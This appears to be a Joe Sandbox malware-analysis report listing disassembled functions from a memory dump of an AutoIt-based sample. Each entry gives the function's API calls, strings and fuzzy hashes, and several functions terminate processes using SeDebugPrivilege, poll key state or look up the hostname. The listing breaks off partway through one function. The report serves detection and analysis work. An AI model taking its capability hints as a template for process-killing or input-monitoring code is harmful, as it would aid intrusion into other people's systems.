Opcode Fuzzy Hash: 96c8794b92f3cac3b71746eb7a232cc1d0c99af14f23626f73d7d94ef53c878f
Instruction Fuzzy Hash: CF5134316743829FD711AF6AC844B6B77E8AF46314F880A2DF994D31E0DB70CC268B52

Function 0030AB3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 002EDD87: CreateToolhelp32Snapshot.KERNEL32 ref: 002EDDAC
Part of subcall function 002EDD87: Process32FirstW.KERNEL32(00000000,?), ref: 002EDDBA
Part of subcall function 002EDD87: CloseHandle.KERNEL32(00000000), ref: 002EDE87

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0030ABCA
GetLastError.KERNEL32 ref: 0030ABDD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0030AC10
TerminateProcess.KERNEL32(00000000,00000000), ref: 0030ACC5
GetLastError.KERNEL32(00000000), ref: 0030ACD0
CloseHandle.KERNEL32(00000000), ref: 0030AD21

Strings

SeDebugPrivilege, xrefs: 0030ABEC

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 37c5455e41ea1d81ba5d579cf0f3396244938d312872459a4124a8c630cdb375
Instruction ID: c9f96930ccc20e307e1a24195915c2b714e20133822dabab0683d1b80b36a358
Opcode Fuzzy Hash: 37c5455e41ea1d81ba5d579cf0f3396244938d312872459a4124a8c630cdb375
Instruction Fuzzy Hash: 8E61CD34219741AFE311DF14D4A4F25BBE5AF54308F1A849CE4668BBE2C771EC45CB92

Function 00314322 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 003143C1
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 003143D6
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 003143F0
_wcslen.LIBCMT ref: 00314435
SendMessageW.USER32(?,00001057,00000000,?), ref: 00314462
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00314490

Strings

SysListView32, xrefs: 00314393

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: 30ef710d2d73cf47624494407f91634978296bed3a81cb742ce57596ea7bdb1f
Instruction ID: 7c4ffb5fcb6096a0dc83f7c88627c6b8595f6c092e059d0bf693eb489d772641
Opcode Fuzzy Hash: 30ef710d2d73cf47624494407f91634978296bed3a81cb742ce57596ea7bdb1f
Instruction Fuzzy Hash: 9241DF31A00308ABDF269F64CC49BEA7BA9FF0C350F110526F958E7291DB74D990CB90

Function 002EC625 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002EC6C4
IsMenu.USER32(00000000), ref: 002EC6E4
CreatePopupMenu.USER32 ref: 002EC71A
GetMenuItemCount.USER32(014F6460), ref: 002EC76B
InsertMenuItemW.USER32(014F6460,?,00000001,00000030), ref: 002EC793

Strings

0, xrefs: 002EC66F
2, xrefs: 002EC6FE

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: 5411770cfa6a5c7672111a37b57f1d8a8a73781c2f395d499e9d08b101ea7ccc
Instruction ID: 77fe264fa459ed8308ec0562b3097cac7840886c97b50d9bc5b2b56b6773e676
Opcode Fuzzy Hash: 5411770cfa6a5c7672111a37b57f1d8a8a73781c2f395d499e9d08b101ea7ccc
Instruction Fuzzy Hash: 6051CD706502869BDF11CFEAC884AAEFBFDAF49314F74811AE81197290D3709962CF61

Function 002819CD Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 002819E1
ScreenToClient.USER32(00000000,?), ref: 002819FE
GetAsyncKeyState.USER32(00000001), ref: 00281A23
GetAsyncKeyState.USER32(00000002), ref: 00281A3D

Strings

$'(, xrefs: 002819F0, 00281A07, 002C3135
$'(, xrefs: 002C31C3, 002C318D, 002C3164

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID: $'($$'(
API String ID: 4210589936-3001180016
Opcode ID: d6968b336a4a7377dc58774cb9f576fdce5b77af0871805fc510256c33ccfbad
Instruction ID: 6ae117330c1c1b1b029adae7ec84ee5dbfc4fa581c962f1733d25137e201643d
Opcode Fuzzy Hash: d6968b336a4a7377dc58774cb9f576fdce5b77af0871805fc510256c33ccfbad
Instruction Fuzzy Hash: B4418F75A1510ABFDF09EF64C844BEEB778FF09324F248719E429A62D0C7705A64CB91

Function 00281B00 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 0028249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002824B0

BeginPaint.USER32(?,?,?), ref: 00281B35
GetWindowRect.USER32(?,?), ref: 00281B99
ScreenToClient.USER32(?,?), ref: 00281BB6
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00281BC7
EndPaint.USER32(?,?,?,?,?), ref: 00281C15
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 002C3287

Part of subcall function 00281C2D: BeginPath.GDI32(00000000), ref: 00281C4B

Strings

(5, xrefs: 00281B0F

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID: (5
API String ID: 3050599898-4024434197
Opcode ID: 1471ede150c5a27934f07fed5fc4b8d503df894dc0ccf84b99307b163d8971cf
Instruction ID: 29bd9a372626247b1e5dbfd10bcc43a699cb435efdda7507cd6837df08eee564
Opcode Fuzzy Hash: 1471ede150c5a27934f07fed5fc4b8d503df894dc0ccf84b99307b163d8971cf
Instruction Fuzzy Hash: 2B41CF74115301AFDB12EF24DC84FA77BACEB4A325F040629FA98862F1C7709D65DB62

Function 003186FC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00318740
SetWindowLongW.USER32(00000000,000000F0,?), ref: 00318765
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0031877D
GetSystemMetrics.USER32(00000004), ref: 003187A6
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,002FC1F2,00000000), ref: 003187C6

Part of subcall function 0028249F: GetWindowLongW.USER32(00000000,000000EB), ref: 002824B0

GetSystemMetrics.USER32(00000004), ref: 003187B1

Strings

(5, xrefs: 00318709

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID: (5
API String ID: 2294984445-4024434197
Opcode ID: 2e5c16f199cb35048810f04b0ab6f78b02df00df37e34cb1958f2793fdfb187c
Instruction ID: c944aaa6cb3e05dca53b31bf4fdfd4689f33aaca4b86a280f37dafc1695b8775
Opcode Fuzzy Hash: 2e5c16f199cb35048810f04b0ab6f78b02df00df37e34cb1958f2793fdfb187c
Instruction Fuzzy Hash: 572162716102519FCB1A5F39DC48AAA77A9FB4A365F254729F926C21F0EF308890CB54

Function 002ED11F Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 002ED1BE

Strings

warning, xrefs: 002ED1A7
blank, xrefs: 002ED140
stop, xrefs: 002ED18F
info, xrefs: 002ED15F
question, xrefs: 002ED177

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 652ae29a6d1cebe4da6c40b6184dff863df81e76e3f71796055b3b23a8b33bee
Instruction ID: 6743c6c502e3cc6e801a6bbbd9a02a871867b0296e52a8b2b5506b470b8b068a
Opcode Fuzzy Hash: 652ae29a6d1cebe4da6c40b6184dff863df81e76e3f71796055b3b23a8b33bee
Instruction Fuzzy Hash: BF11EB352E8747BBE7055E15DC82DEA7BDC9F06760B900029F908AE1C2DBF4AA104560

Function 002EE73E Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 002EE759
gethostname.WSOCK32(?,00000100), ref: 002EE773
gethostbyname.WSOCK32(?), ref: 002EE780
inet_ntoa.WSOCK32(?), ref: 002EE7C2
_strcat.LIBCMT ref: 002EE7D0
WSACleanup.WSOCK32 ref: 002EE7F5

Strings

0.0.0.0, xrefs: 002EE79E

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 642191829-3771769585
Opcode ID: ebfb098268b28f800d2f23641b6801c30a640f744f6b55afb00a297c86eea8a9
Instruction ID: 0a0ad66f93ed62e5f97c514bfb13b380a66c35aa9de901c5cf3ea86440edc233
Opcode Fuzzy Hash: ebfb098268b28f800d2f23641b6801c30a640f744f6b55afb00a297c86eea8a9
Instruction Fuzzy Hash: 861106319201157FCF25BB71DC4AEDE77ACEF46720F410166F519A6091EFB4CA91CA50

Function 002EF630 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 002EF641
_wcslen.LIBCMT ref: 002EF652
_wcslen.LIBCMT ref: 002EF690
_wcslen.LIBCMT ref: 002EF6C6
_wcslen.LIBCMT ref: 002EF6F6
_wcslen.LIBCMT ref: 002EF706
_wcslen.LIBCMT ref: 002EF742
_wcslen.LIBCMT ref: 002EF771

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 5d3726bd1b61060252f4f24aafaabd2c91d802ff70443f6af2474b2298624537
Instruction ID: 5285a1b9d5fc4904dce4afd0a1af2b7d55e9da2aea9d77e5f44ff343b12644fa
Opcode Fuzzy Hash: 5d3726bd1b61060252f4f24aafaabd2c91d802ff70443f6af2474b2298624537
Instruction Fuzzy Hash: AD41B265C60614B6CB11EBB88C8AACFB3ACAF06710F408422E50CE3121FF74D271C7A6

Function 0031379F Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 003137B7
GetDC.USER32(00000000), ref: 003137BF
GetDeviceCaps.GDI32(00000000,0000005A), ref: 003137CA
ReleaseDC.USER32(00000000,00000000), ref: 003137D6
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00313812
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00313823
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00316504,?,?,000000FF,00000000,?,000000FF,?), ref: 0031385E
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 0031387D

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: ca8a0d7b42384070d1887847b099d1de4a4d333fc989509e3e7b9a1d004943b8
Instruction ID: 8a50929c3ae39db67832f7faa77298528baffc41b058ecfa427bb75d048c79bd
Opcode Fuzzy Hash: ca8a0d7b42384070d1887847b099d1de4a4d333fc989509e3e7b9a1d004943b8
Instruction Fuzzy Hash: 22318E72201214BFEB168F54DC89FEB3BADEF4E711F044065FE089A291C6B59D81C7A4

Function 00305A0B Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 00305A8B, 00305DE0
Not an Object type, xrefs: 00305A64

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 7d8e3c028cb307c964d2fc6fc28c976c150844ff27f827d1877ff904fa3a7e12
Instruction ID: 18ed5ce1942d74a2a896cfaa57b7c31096ddb3733995027cc68346412cdfc04b
Opcode Fuzzy Hash: 7d8e3c028cb307c964d2fc6fc28c976c150844ff27f827d1877ff904fa3a7e12
Instruction Fuzzy Hash: BED1C071A0160A9FDF11CF68C8A5BAEB7B9FF48304F158469E915AB281E770ED41CF60

Function 002C18A2 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,002C1B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 002C194E
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,002C1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 002C19D1
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,002C1B7B,?,002C1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 002C1A64
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,002C1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 002C1A7B

Part of subcall function 002B3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,002A6A79,?,0000015D,?,?,?,?,002A85B0,000000FF,00000000,?,?), ref: 002B3BC5

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,002C1B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 002C1AF7
__freea.LIBCMT ref: 002C1B22
__freea.LIBCMT ref: 002C1B2E

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 0174ada71793c6a2fa657f5c59f2872f51677bcedee564320633d3a0ff94bb5f
Instruction ID: c7d0876c455a43a8a06d77490b1c23867141ca88c08a64458d3340fa8d6daecd
Opcode Fuzzy Hash: 0174ada71793c6a2fa657f5c59f2872f51677bcedee564320633d3a0ff94bb5f
Instruction Fuzzy Hash: 3B91A472E202169ADB258E64C892FEE7BB59F0B314F18475DE805E7142EB35DD70CB60

Function 00304F80 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 003050A5
VariantInit.OLEAUT32(?), ref: 003051A6
VariantClear.OLEAUT32(?), ref: 003051B0
VariantClear.OLEAUT32(?), ref: 0030520D

Strings

Incorrect Object type in FOR..IN loop, xrefs: 00305189
Null Object assignment in FOR..IN loop, xrefs: 00305035, 00305163, 0030521B

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 53f8cb62d76288028223df87a4146a2a7a22a711f93dac8700277e589f4ab157
Instruction ID: 8b4e58cbf777b93de16abe9ab8bbf15f33f5c039c3d1c5acedd198352c72cc81
Opcode Fuzzy Hash: 53f8cb62d76288028223df87a4146a2a7a22a711f93dac8700277e589f4ab157
Instruction Fuzzy Hash: 4891BD71A01619ABDF26CFA5CC98FAFBBB8EF45314F108519F505AB280D770A941CFA0

Function 003043A4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 003043C8
CharUpperBuffW.USER32(?,?), ref: 003044D7
_wcslen.LIBCMT ref: 003044E7
VariantClear.OLEAUT32(?), ref: 0030467C

Part of subcall function 002F169E: VariantInit.OLEAUT32(00000000), ref: 002F16DE
Part of subcall function 002F169E: VariantCopy.OLEAUT32(?,?), ref: 002F16E7
Part of subcall function 002F169E: VariantClear.OLEAUT32(?), ref: 002F16F3

Strings

AUTOIT.ERROR, xrefs: 003044DD, 003044E2
Incorrect Parameter format, xrefs: 00304403, 003045FE

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 49d44501bf7d40d22d04f47f850744645ddc3e6e320de254fef8e9d3cb5234c9
Instruction ID: 1d1150ba5ba3f7dc5839357771373139e7e20b05f5fd9d886a6dc3268f32f004
Opcode Fuzzy Hash: 49d44501bf7d40d22d04f47f850744645ddc3e6e320de254fef8e9d3cb5234c9
Instruction Fuzzy Hash: 289146B46193019FC701EF24C49096AB7E9BF89314F14892DF9899B391DB31EE06CF82

Function 0030560A Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 002E08FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,002E0831,80070057,?,?,?,002E0C4E), ref: 002E091B
Part of subcall function 002E08FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002E0831,80070057,?,?), ref: 002E0936
Part of subcall function 002E08FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002E0831,80070057,?,?), ref: 002E0944
Part of subcall function 002E08FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,002E0831,80070057,?), ref: 002E0954

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 003056AE
_wcslen.LIBCMT ref: 003057B6
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0030582C
CoTaskMemFree.OLE32(?), ref: 00305837

Strings

NULL Pointer assignment, xrefs: 00305880, 003058AF

Memory Dump Source

Source File: 0000000D.00000002.4648674411.0000000000281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00280000, based on PE: true

Associated: 0000000D.00000002.4648652377.0000000000280000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.000000000031D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648746089.0000000000343000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648814566.000000000034D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.4648840809.0000000000355000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_280000_Preceding.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: bc1c1e58ec3187ec371bfb50601facc758519857df2b667fc8fbc6a0dd0d5467
Instruction ID: 4018022d783ebe93a37c22fbb95b58f5e1edddbde6608f29acdfdf3e555bdcd5
Opcode Fuzzy Hash: bc1c1e58ec3187ec371bfb50601facc758519857df2b667fc8fbc6a0dd0d5467
Instruction Fuzzy Hash: BD912875D1121DEFDF11EFA4C890AEEB7B8BF08700F108569E915A7291DB709A54CF60

Function 00312B99 Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00312C1F
GetMenuItemCount.USER32(00000000), ref: 00312C51
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00312C79
_wcslen.LIBCMT ref: 00312CAF
GetMenuItemID.USER32(?,?), ref: 00312CE9
GetSubMenu.USER32(?,?), ref: 00312CF7

Part of subcall function 002E4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 002E43AD
Part of subcall function 002E4393: GetCurrentThreadId.KERNEL32 ref: 002E43B4
Part of subcall function 002E4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002E2F00), ref: 002E43BB

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00312D7F

